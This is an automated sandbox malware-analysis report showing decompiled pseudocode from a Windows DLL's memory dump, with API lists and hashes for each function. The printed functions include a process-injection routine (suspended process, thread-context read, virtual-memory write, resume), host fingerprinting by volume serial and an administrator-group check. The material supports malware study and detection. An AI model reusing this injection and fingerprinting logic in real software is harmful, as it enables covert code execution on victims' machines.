    					GetModuleHandleA(0);
    					_t23 = _a4;
    					 *0x1001e69c = _t23;
    					_t24 = GetModuleFileNameW(_t23,  &_v664, 0x104);
    					_t25 = GetLastError();
    					if(_t24 == 0 || _t25 == 0x7a) {
    						L10:
    						return 0;
    					} else {
    						memset( &_v144, 0, 0x80);
    						_t58 = _t57 + 0xc;
    						_t56 = 0;
    						do {
    							_t29 = E100095AD(_t56);
    							_a8 = _t29;
    							MultiByteToWideChar(0, 0, _t29, 0xffffffff,  &_v144, 0x3f);
    							E100085A8( &_a8);
    							_t56 =  &(_t56->nLength);
    						} while (_t56 < 0x2710);
    						E10012A66( *0x1001e69c);
    						 *_t58 = 0x7c3;
    						 *0x1001e684 = E1000E1C7(0x1001ba20, 0x11c);
    						 *_t58 = 0xb4e;
    						_t34 = E100095C7(0x1001ba20);
    						_a8 = _t34;
    						_t35 = GetFileAttributesW(_t34); // executed
    						_push( &_a8);
    						if(_t35 == 0xffffffff) {
    							E100085BB();
    							_v8 = 0;
    							_t40 = CreateThread(0, 0, E10005DEE, 0, 0,  &_v8);
    							 *0x1001e6a8 = _t40;
    							if(_t40 != 0) {
    								goto L15;
    							}
    							goto L10;
    						}
    						E100085BB();
    						goto L10;
    					}
    				}
    			}

    APIs
    • TerminateThread.KERNELBASE(00000000), ref: 100060B6
      • Part of subcall function 100085D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F84), ref: 100085DE
      • Part of subcall function 100097F2: GetSystemTimeAsFileTime.KERNEL32(?,?,10005F8C), ref: 100097FF
    • GetModuleHandleA.KERNEL32(00000000), ref: 10005FA9
    • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FC4
    • GetLastError.KERNEL32 ref: 10005FCC
    • memset.MSVCRT ref: 10005FF0
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006012
    • GetFileAttributesW.KERNELBASE(00000000), ref: 10006060
    • CreateThread.KERNEL32(00000000,00000000,10005DEE,00000000,00000000,?), ref: 10006094
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: File$CreateModuleThreadTime$AttributesByteCharErrorHandleHeapLastMultiNameSystemTerminateWidememset
    • String ID:
    • API String ID: 1832041143-0
    • Opcode ID: 7e808ea799e680f3c2fd863b6732618b7865da000cb2eca94c581aef9a0140a7
    • Instruction ID: a20790f259ae4b3f06c91942fa7be99be5cb131edc2f008d1ecb11abc9cb9497
    • Opcode Fuzzy Hash: 7e808ea799e680f3c2fd863b6732618b7865da000cb2eca94c581aef9a0140a7
    • Instruction Fuzzy Hash: 2631C275840154ABFB11DB20CC89EAE37B9EB487A0F20C529F859D6195EB34AB45CB22
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E1000B78E(WCHAR* __ecx, void* __edx) {
    				long _v8;
    				long _v12;
    				WCHAR* _v16;
    				short _v528;
    				short _v1040;
    				short _v1552;
    				intOrPtr _t23;
    				WCHAR* _t27;
    				signed int _t29;
    				void* _t33;
    				long _t38;
    				WCHAR* _t43;
    				WCHAR* _t56;
    
    				_t44 = __ecx;
    				_v8 = _v8 & 0x00000000;
    				_t43 = __edx;
    				_t56 = __ecx;
    				memset(__edx, 0, 0x100);
    				_v12 = 0x100;
    				_t23 =  *0x1001e684; // 0x306f878
    				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
    				lstrcpynW(_t43,  &_v528, 0x100);
    				_t27 = E100095C7(_t44, 0xa88);
    				_v16 = _t27;
    				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
    				asm("sbb eax, eax");
    				_v8 = _v8 &  ~_t29;
    				E100085BB( &_v16);
    				_t33 = E1000C39D(_t43);
    				E10009626( &(_t43[E1000C39D(_t43)]), 0x100 - _t33, L"%u", _v8);
    				lstrcatW(_t43, _t56);
    				_t38 = E1000C39D(_t43);
    				_v12 = _t38;
    				CharUpperBuffW(_t43, _t38);
    				return E1000D40B(_t43, E1000C39D(_t43) + _t40, 0);
    			}

    APIs
    • memset.MSVCRT ref: 1000B7AB
    • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7D5
    • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B807
      • Part of subcall function 10009626: _vsnwprintf.MSVCRT ref: 10009643
    • lstrcatW.KERNEL32(?,00000114), ref: 1000B840
    • CharUpperBuffW.USER32(?,00000000), ref: 1000B852
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
    • String ID:
    • API String ID: 455400327-0
    • Opcode ID: b942919f709bbc5ee76562d8b93a0ca6cadf47ed1a8cc120fd559aea66f26d5c
    • Instruction ID: 54ded0e5f58a315f66d10a54a7c6d114594958cb431f06a38f87ddf0e98dcf8a
    • Opcode Fuzzy Hash: b942919f709bbc5ee76562d8b93a0ca6cadf47ed1a8cc120fd559aea66f26d5c
    • Instruction Fuzzy Hash: 0F2153B6900218BFE714DBB4CC8AFEE77BCEB58250F108569F505D6185EA74AF448B60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E1000CA30(intOrPtr __edx) {
    				signed int _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				char _v24;
    				void* _v36;
    				char _v40;
    				char _v80;
    				char _t37;
    				intOrPtr _t38;
    				void* _t45;
    				intOrPtr _t47;
    				intOrPtr _t48;
    				intOrPtr _t50;
    				intOrPtr _t52;
    				void* _t54;
    				intOrPtr _t57;
    				long _t61;
    				intOrPtr _t62;
    				signed int _t65;
    				signed int _t68;
    				signed int _t82;
    				void* _t85;
    				char _t86;
    
    				_v8 = _v8 & 0x00000000;
    				_v20 = __edx;
    				_t65 = 0;
    				_t37 = E1000C908( &_v8);
    				_t86 = _t37;
    				_v24 = _t86;
    				_t87 = _t86;
    				if(_t86 == 0) {
    					return _t37;
    				}
    				_t38 =  *0x1001e688; // 0x2ff04a0
    				E1000A853( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
    				_t82 = _v8;
    				_t68 = 0;
    				_v16 = 0;
    				if(_t82 == 0) {
    					L20:
    					E10008600( &_v24, 0);
    					return _t65;
    				}
    				while(_t65 == 0) {
    					while(_t65 == 0) {
    						asm("stosd");
    						asm("stosd");
    						asm("stosd");
    						asm("stosd");
    						_t45 = E1000AE4C( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
    						_t92 = _t45;
    						if(_t45 >= 0) {
    							_t54 = E1000CB82(E10005CD4,  &_v40, _t92, _v20); // executed
    							if(_t54 != 0) {
    								_t57 =  *0x1001e684; // 0x306f878
    								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
    								if(_t85 != 0) {
    									GetLastError();
    									_t61 = ResumeThread(_v36);
    									_t62 =  *0x1001e684; // 0x306f878
    									if(_t61 != 0) {
    										_push(0xea60);
    										_push(_t85);
    										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
    											_t65 = _t65 + 1;
    										}
    										_t62 =  *0x1001e684; // 0x306f878
    									}
    									CloseHandle(_t85);
    								}
    							}
    						}
    						if(_v40 != 0) {
    							if(_t65 == 0) {
    								_t52 =  *0x1001e684; // 0x306f878
    								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
    							}
    							_t48 =  *0x1001e684; // 0x306f878
    							 *((intOrPtr*)(_t48 + 0x30))(_v36);
    							_t50 =  *0x1001e684; // 0x306f878
    							 *((intOrPtr*)(_t50 + 0x30))(_v40);
    						}
    						_t68 = _v16;
    						_t47 = _v12 + 1;
    						_v12 = _t47;
    						if(_t47 < 2) {
    							continue;
    						} else {
    							break;
    						}
    					}
    					_t82 = _v8;
    					_t68 = _t68 + 1;
    					_v16 = _t68;
    					if(_t68 < _t82) {
    						continue;
    					} else {
    						break;
    					}
    					do {
    						goto L19;
    					} while (_t82 != 0);
    					goto L20;
    				}
    				L19:
    				E10008600(_t86, 0xfffffffe);
    				_t86 = _t86 + 4;
    				_t82 = _t82 - 1;
    			}

    APIs
      • Part of subcall function 1000AE4C: memset.MSVCRT ref: 1000AE6B
      • Part of subcall function 1000AE4C: CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AE8B
      • Part of subcall function 1000CB82: memset.MSVCRT ref: 1000CBC3
      • Part of subcall function 1000CB82: GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CBE4
      • Part of subcall function 1000CB82: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC2D
      • Part of subcall function 1000CB82: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC4A
      • Part of subcall function 1000CB82: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC6B
      • Part of subcall function 1000CB82: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC7E
    • GetLastError.KERNEL32(?,00000001), ref: 1000CAD7
    • ResumeThread.KERNELBASE(?,?,00000001), ref: 1000CAE5
    • CloseHandle.KERNELBASE(00000000,?,00000001), ref: 1000CB08
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryVirtual$ProtectThreadmemset$CloseContextCreateErrorFreeHandleLastLibraryProcessResumeWrite
    • String ID:
    • API String ID: 255987474-0
    • Opcode ID: f017f5ca36172552206ab6814e1b6acc202bbb2cd86ed6c5daeb2e80a43bce25
    • Instruction ID: e521cf2fa20f76da4a6a589b73753f886015824dfe40e4b6c65f35b4029dd3c9
    • Opcode Fuzzy Hash: f017f5ca36172552206ab6814e1b6acc202bbb2cd86ed6c5daeb2e80a43bce25
    • Instruction Fuzzy Hash: BC416175A00319AFEB41CFA8C985EAE77F9EF58390F624168F501E7265DB30AE04CB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E1000B97E(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
    				long _v8;
    				void* _v12;
    				void* _t12;
    				void* _t20;
    				void* _t22;
    				union _TOKEN_INFORMATION_CLASS _t28;
    				void* _t31;
    
    				_push(_t22);
    				_push(_t22);
    				_t31 = 0;
    				_t28 = __edx;
    				_t20 = _t22;
    				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L6:
    					_t12 = _t31;
    				} else {
    					_t31 = E100085EA(_v8);
    					_v12 = _t31;
    					if(_t31 != 0) {
    						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
    							goto L6;
    						} else {
    							E10008600( &_v12, _t16);
    							goto L3;
    						}
    					} else {
    						L3:
    						_t12 = 0;
    					}
    				}
    				return _t12;
    			}

    APIs
    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B999
    • GetLastError.KERNEL32(?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9A0
      • Part of subcall function 100085EA: HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9CF
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: InformationToken$AllocErrorHeapLast
    • String ID:
    • API String ID: 4258577378-0
    • Opcode ID: 9279372076375fae395de7efc729ad16c310fd33d23b52249bdd110484013589
    • Instruction ID: 284435f3304a0403768820705fc5d69a9fc577f17fcada2a8c023e96f564319f
    • Opcode Fuzzy Hash: 9279372076375fae395de7efc729ad16c310fd33d23b52249bdd110484013589
    • Instruction Fuzzy Hash: C401AD72600625BFE724CFA5DC89D8F7FECEF456E47220126FA05E2214E630DE0087A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E1000AE4C(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
    				struct _STARTUPINFOW _v72;
    				signed int _t11;
    				WCHAR* _t15;
    				int _t19;
    				struct _PROCESS_INFORMATION* _t20;
    
    				_t20 = __edx;
    				_t15 = __ecx;
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t19 = 0x44;
    				memset( &_v72, 0, _t19);
    				_v72.cb = _t19;
    				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
    				asm("sbb eax, eax");
    				return  ~( ~_t11) - 1;
    			}

    APIs
    • memset.MSVCRT ref: 1000AE6B
    • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AE8B
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateProcessmemset
    • String ID:
    • API String ID: 2296119082-0
    • Opcode ID: 174ec3214e28821afa587fbbfd75607311efd5e59e5c1ad3bc0eb5b6b150231f
    • Instruction ID: 317c0f0a3250aa545c808d97f4cc2eb77fe6aff884bafd0b8a01d2d5859a8f4e
    • Opcode Fuzzy Hash: 174ec3214e28821afa587fbbfd75607311efd5e59e5c1ad3bc0eb5b6b150231f
    • Instruction Fuzzy Hash: 61F01CF26042187FF760DAADDC46EBBB7ACCB88664F104532FA05D61A0E560ED0582A1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E1000E1C7(void* __ecx, void* __edx, intOrPtr _a4) {
    				char _v8;
    				char _t5;
    				struct HINSTANCE__* _t7;
    				void* _t10;
    				void* _t12;
    				void* _t22;
    				void* _t25;
    
    				_push(__ecx);
    				_t12 = __ecx;
    				_t22 = __edx;
    				_t5 = E100095AD(_a4);
    				_t25 = 0;
    				_v8 = _t5;
    				_push(_t5);
    				if(_a4 != 0x7c3) {
    					_t7 = LoadLibraryA(); // executed
    				} else {
    					_t7 = GetModuleHandleA();
    				}
    				if(_t7 != 0) {
    					_t10 = E1000E17C(_t12, _t22, _t7); // executed
    					_t25 = _t10;
    				}
    				E100085A8( &_v8);
    				return _t25;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA20), ref: 1000E1E9
    • LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,1001BA20), ref: 1000E1F6
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: HandleLibraryLoadModule
    • String ID:
    • API String ID: 4133054770-0
    • Opcode ID: cf321a245d88a0638fbef26b27aa7ee3fe0e7c4b77512a4ccbee289a1163a098
    • Instruction ID: a81f8a8a0c32fb3f2a3472acf433f6b75368d58d8bdf92bb45fed00c9d335e66
    • Opcode Fuzzy Hash: cf321a245d88a0638fbef26b27aa7ee3fe0e7c4b77512a4ccbee289a1163a098
    • Instruction Fuzzy Hash: D1F08231700164ABF704DB6DDC8589EB3ECDB987D1711413AF406E3155DA70EE4087E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E1000CCCB(void* __ecx, intOrPtr _a4, signed int _a8) {
    				CHAR* _v8;
    				int _t28;
    				signed int _t31;
    				signed int _t34;
    				signed int _t35;
    				void* _t38;
    				signed int* _t41;
    
    				_t41 = _a8;
    				_t31 = 0;
    				if(_t41[1] > 0) {
    					_t38 = 0;
    					do {
    						_t3 =  &(_t41[2]); // 0xe6840d8b
    						_t34 =  *_t3;
    						_t35 = 0;
    						_a8 = 0;
    						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
    							_v8 = _a4 + 0x24;
    							while(1) {
    								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
    								_t14 =  &(_t41[2]); // 0xe6840d8b
    								_t34 =  *_t14;
    								if(_t28 == 0) {
    									break;
    								}
    								_t35 = _a8 + 1;
    								_a8 = _t35;
    								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
    									continue;
    								} else {
    								}
    								goto L8;
    							}
    							 *_t41 =  *_t41 |  *(_t34 + _t38);
    						}
    						L8:
    						_t31 = _t31 + 1;
    						_t38 = _t38 + 0x10;
    						_t20 =  &(_t41[1]); // 0x1374ff85
    					} while (_t31 <  *_t20);
    				}
    				Sleep(0xa);
    				return 1;
    			}

    APIs
    • lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000ABF3,?,?), ref: 1000CCFF
    • Sleep.KERNELBASE(0000000A,00000000,?,?,?,1000ABF3,?,?), ref: 1000CD31
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: Sleeplstrcmpi
    • String ID:
    • API String ID: 1261054337-0
    • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
    • Instruction ID: 926fc2af3184635391a797f2ab8243a47acf96363bf1e1ad5409ce987fcc7f05
    • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
    • Instruction Fuzzy Hash: 21018C31600709AFEB10CF6AC8C0D5AB7E6FF983A4711C07EE95A8B215D230FA42DB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E10005E7E() {
    				intOrPtr _t3;
    
    				_t3 =  *0x1001e684; // 0x306f878
    				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
    				ExitProcess(0);
    			}

    APIs
    • ExitProcess.KERNEL32(00000000), ref: 10005E95
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: ExitProcess
    • String ID:
    • API String ID: 621844428-0
    • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
    • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
    • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
    • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E100085D5() {
    				void* _t1;
    
    				_t1 = HeapCreate(0, 0x80000, 0); // executed
    				 *0x1001e768 = _t1;
    				return _t1;
    			}

    APIs
    • HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F84), ref: 100085DE
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateHeap
    • String ID:
    • API String ID: 10892065-0
    • Opcode ID: c3188154532433d8b109a5d37b9c6942cb9ab30fb6aa49832194727f4698bc8e
    • Instruction ID: 016c441e565f87a7eecd2a7559f4fcf8aaa250baf654664f6a0682c010cac13f
    • Opcode Fuzzy Hash: c3188154532433d8b109a5d37b9c6942cb9ab30fb6aa49832194727f4698bc8e
    • Instruction Fuzzy Hash: C7B012B0684B1056F2D01B204DC6B043590A308B0AF304000F308581D0C6B05104CB04
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E1000BA48(void* __ecx, void* __esi) {
    				intOrPtr* _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				char _v24;
    				short _v28;
    				char _v32;
    				void* _t20;
    				intOrPtr* _t21;
    				intOrPtr _t29;
    				intOrPtr _t31;
    				intOrPtr* _t33;
    				intOrPtr _t34;
    				char _t37;
    				union _TOKEN_INFORMATION_CLASS _t44;
    				char _t45;
    				intOrPtr* _t48;
    
    				_t37 = 0;
    				_v28 = 0x500;
    				_t45 = 0;
    				_v32 = 0;
    				_t20 = E1000B92C(__ecx);
    				_v16 = _t20;
    				if(_t20 != 0) {
    					_push( &_v24);
    					_t44 = 2;
    					_t21 = E1000B97E(_t44); // executed
    					_t48 = _t21;
    					_v20 = _t48;
    					if(_t48 == 0) {
    						L10:
    						CloseHandle(_v16);
    						if(_t48 != 0) {
    							E10008600( &_v20, _t37);
    						}
    						return _t45;
    					}
    					_push( &_v12);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0x220);
    					_push(0x20);
    					_push(2);
    					_push( &_v32);
    					_t29 =  *0x1001e68c; // 0x306fa40
    					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
    						goto L10;
    					}
    					if( *_t48 <= 0) {
    						L9:
    						_t31 =  *0x1001e68c; // 0x306fa40
    						 *((intOrPtr*)(_t31 + 0x10))(_v12);
    						_t37 = 0;
    						goto L10;
    					}
    					_t9 = _t48 + 4; // 0x4
    					_t33 = _t9;
    					_v8 = _t33;
    					while(1) {
    						_push(_v12);
    						_push( *_t33);
    						_t34 =  *0x1001e68c; // 0x306fa40
    						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
    							break;
    						}
    						_t37 = _t37 + 1;
    						_t33 = _v8 + 8;
    						_v8 = _t33;
    						if(_t37 <  *_t48) {
    							continue;
    						}
    						goto L9;
    					}
    					_t45 = 1;
    					goto L9;
    				}
    				return _t20;
    			}

    APIs
      • Part of subcall function 1000B92C: GetCurrentThread.KERNEL32 ref: 1000B93F
      • Part of subcall function 1000B92C: GetLastError.KERNEL32(?,?,1000BA62,73BCF500,10000000), ref: 1000B94D
      • Part of subcall function 1000B92C: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA62,73BCF500,10000000), ref: 1000B966
      • Part of subcall function 1000B97E: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B999
      • Part of subcall function 1000B97E: GetLastError.KERNEL32(?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9A0
    • CloseHandle.KERNELBASE(?,00000000,73BCF500,10000000), ref: 1000BAEC
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CurrentErrorLast$CloseHandleInformationProcessThreadToken
    • String ID:
    • API String ID: 3752664914-0
    • Opcode ID: 9ae93498d3beea09f533c95f90db021d1976d1c1be687782160d81f63b76ad47
    • Instruction ID: 1adc8f8ddfe33038bce3f4a157c31629282edc9b40e44d36358bc691b51babd1
    • Opcode Fuzzy Hash: 9ae93498d3beea09f533c95f90db021d1976d1c1be687782160d81f63b76ad47
    • Instruction Fuzzy Hash: 75215071A00619AFEB04DFA9DC85EAEB7F8EF48780B514069F601E7255D730DD00CB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E100085EA(long _a4) {
    				void* _t2;
    
    				_t2 = HeapAlloc( *0x1001e768, 8, _a4); // executed
    				return _t2;
    			}

    APIs
    • HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocHeap
    • String ID:
    • API String ID: 4292702814-0
    • Opcode ID: f52ff42663d9d892c94b44c72d67274e92aa5b68dc6bf6c7fa1343fdaf41d4b4
    • Instruction ID: 9a291c990e77f445172f2a03277bd68ee76f3999a476da38a02c0ca707d440ed
    • Opcode Fuzzy Hash: f52ff42663d9d892c94b44c72d67274e92aa5b68dc6bf6c7fa1343fdaf41d4b4
    • Instruction Fuzzy Hash: CDB0923148461CFBFA421B91DC45A88BF69E708759F00C010F60C040B2CA72AA649B90
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 81%
    			E1001538F(void* __edi) {
    				signed int _t164;
    				unsigned int _t172;
    				unsigned int _t173;
    				signed int _t174;
    				signed int _t176;
    				signed int _t178;
    				signed int _t179;
    				signed int _t182;
    				signed int _t184;
    				unsigned int _t185;
    				int _t186;
    				int _t194;
    				signed char _t200;
    				signed int _t207;
    				signed int _t208;
    				signed int _t209;
    				int _t210;
    				int _t222;
    				signed int _t227;
    				signed int _t235;
    				signed int _t251;
    				signed char _t252;
    				unsigned int _t253;
    				signed char _t254;
    				signed int* _t255;
    				signed int _t258;
    				signed int _t259;
    				signed int _t260;
    				signed int _t266;
    				intOrPtr _t271;
    				signed char _t278;
    				signed int _t279;
    				char* _t280;
    				signed int _t282;
    				signed char _t284;
    				signed int _t287;
    				signed int _t291;
    				int _t292;
    				int _t293;
    				int _t296;
    				int _t298;
    				int _t302;
    				signed int _t305;
    				signed char _t311;
    				signed char _t312;
    				signed char _t315;
    				signed char _t316;
    				signed int _t318;
    				int _t319;
    				int _t320;
    				signed char _t322;
    				int _t324;
    				int _t326;
    				int _t330;
    				signed int _t333;
    				signed char _t336;
    				signed char _t337;
    				signed char _t339;
    				int _t341;
    				signed int _t347;
    				int _t349;
    				intOrPtr _t350;
    				intOrPtr _t351;
    				unsigned int _t356;
    				unsigned int _t361;
    				signed int _t364;
    				signed int _t365;
    				intOrPtr _t367;
    				void* _t368;
    				intOrPtr* _t380;
    				void* _t381;
    				intOrPtr* _t389;
    				void* _t390;
    				signed int _t395;
    				void* _t396;
    				signed int _t397;
    				void* _t403;
    				void* _t405;
    				intOrPtr* _t412;
    				void* _t413;
    				signed int _t414;
    				void* _t416;
    				intOrPtr* _t423;
    				void* _t424;
    				unsigned int _t430;
    				signed int _t431;
    				void* _t434;
    				signed int* _t435;
    				void* _t439;
    
    				 *((intOrPtr*)(__edi + 0x56))();
    				asm("pushfd");
    				_t435 = _t434 - 0x40;
    				asm("cld");
    				_t395 = _t435[0x16];
    				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
    				_t164 =  *_t395;
    				_t435[0xb] = _t164;
    				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
    				_t271 =  *((intOrPtr*)(_t395 + 0x10));
    				_t251 =  *(_t395 + 0xc);
    				_t435[0xf] = _t251;
    				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
    				_t435[4] = _t271 - 0x101 + _t251;
    				_t435[2] =  *(_t367 + 0x4c);
    				_t435[3] =  *(_t367 + 0x50);
    				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
    				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
    				_t172 =  *(_t367 + 0x28);
    				_t347 =  *(_t367 + 0x34);
    				_t435[0xd] = _t172;
    				_t435[0xc] =  *(_t367 + 0x30);
    				_t435[0xe] = _t347;
    				_t430 =  *(_t367 + 0x38);
    				_t252 =  *(_t367 + 0x3c);
    				_t396 = _t435[0xb];
    				_t278 = _t435[5];
    				if(_t278 > _t396) {
    					L2:
    					if((_t396 & 0x00000003) != 0) {
    						_t396 = _t396 + 1;
    						_t278 = _t252;
    						_t252 = _t252 + 8;
    						_t172 = 0 << _t278;
    						_t430 = _t430 | _t172;
    						goto L2;
    					}
    					goto L4;
    				} else {
    					_t341 = _t278 + 0xb - _t396;
    					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
    					_t435 =  &(_t435[6]);
    					_t278 = 0;
    					_t396 =  &(_t435[7]);
    					_t435[5] = _t396;
    					L4:
    					_t368 = _t435[0xf];
    					while(1) {
    						_t439 =  *0x1001d040 - 2;
    						if(_t439 == 0) {
    							break;
    						}
    						if(_t439 > 0) {
    							do {
    								if(_t252 <= 0xf) {
    									asm("lodsw");
    									_t322 = _t252;
    									_t252 = _t252 + 0x10;
    									_t430 = _t431 | 0 << _t322;
    								}
    								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
    								while(1) {
    									_t253 = _t252 - _t173;
    									_t431 = _t430 >> _t173;
    									if(_t173 == 0) {
    										asm("stosb");
    										goto L22;
    									}
    									_t356 = _t173 >> 0x10;
    									_t311 = _t173;
    									if((_t173 & 0x00000010) == 0) {
    										if((_t173 & 0x00000040) != 0) {
    											L97:
    											if((_t173 & 0x00000020) == 0) {
    												_t280 = "invalid literal/length code";
    												_t350 = 0x1a;
    											} else {
